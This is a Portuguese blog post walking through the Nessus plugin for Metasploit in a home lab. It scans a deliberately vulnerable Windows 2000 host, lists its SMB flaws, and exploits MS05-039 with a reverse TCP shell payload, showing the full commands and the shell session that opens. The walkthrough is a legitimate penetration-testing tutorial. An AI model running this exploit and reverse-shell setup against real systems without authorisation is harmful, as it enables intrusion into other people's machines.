Press "Enter" to skip to content

Brincando com o plugin do Nessus para o Metasploit

Recentemente o desenvolvedor Zate Berg disponibilizou um plug-in do Nessus para o Metasploit Framework ele está disponivel na versão em desenvolvimento do MSF.

Para os testes utilizei o seguinte cenário:

* Host Debian com Nessus e Metasploit
* Host Alvo com Windows 2000 “bugado até a alma”

Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão

cd /tmp/pentest_tools/trunk

svn update

/opt/nessus/sbin/nessus-update-plugins

/opt/nessus/sbin/nessus-service &

./msconsole

| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| ‘_ ` _ / _ __/ _` / __| ‘_ | |/ _ | | __|
| | | | | | __/ || (_| __ |_) | | (_) | | |_
|_| |_| |_|___|____,_|___/ .__/|_|___/|_|__|
| |
|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ — –=[ 592 exploits – 302 auxiliary
+ — –=[ 225 payloads – 27 encoders – 8 nops
=[ svn r10505 updated today (2010.09.28)

msf>

Diversão 🙂

Carregando o Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Conectando…

msf> nessus_connect localhost:8834 ok

[+] Username:
alexos
[+] Password:
***********
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated

Listando as políticas existentes no Nessus

msf> nessus_policy_list

[+] Nessus Policy List

ID Name Owner visability
— —- —– ———-
1 attack alexos private

Iniciando a varredura

msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6

[*] Creating scan from policy number 1, called “alexoscorelabs” and scanning 192.168.0.6
[*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Finalizada a verredura é hora de checar o relatório

msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8

[+] Host Info

Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3
—- ——– ——– ———— —– —– —– —–
0 icmp 1 general 0 2 0 0
0 tcp 3 general 0 9 0 1
0 udp 1 general 0 1 0 0
21 tcp 3 ftp 1 4 2 2
135 tcp 3 epmap 1 1 0 1
135 udp 3 epmap? 0 0 0 1
137 udp 1 netbios-ns 0 1 0 0
139 tcp 1 smb 1 1 0 0
445 tcp 3 cifs 1 10 2 12
1025 tcp 3 dce-rpc 1 1 0 1
1028 udp 1 dce-rpc 0 1 0 0
5800 tcp 1 www 1 4 0 0
5801 tcp 1 www 1 3 0 0
5900 tcp 3 vnc 1 2 0 1
5901 tcp 1 vnc 1 3 0 0

Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo

msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector
—- ——– ——– ———– —– ——– — ———– ———–
cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .
cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .
cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .
cifs (445/tcp) 1 11011 SMB Service Detection none . . None .
cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .
cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .
cifs (445/tcp) 1 17651 Obtains the password policy none . . None .
cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .
cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 2 18585 SMB Service Enumeration via srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .
cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .
cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution

msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the SMB service…
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[browser] …
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[browser] …
[*] Calling the vulnerable function…
[*] Sending stage (240 bytes) to 192.168.0.6
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:WINNTsystem32>

C:WINNTsystem32> ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2

Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o Ethercap para testes de MITM.

One Comment

Comments are closed.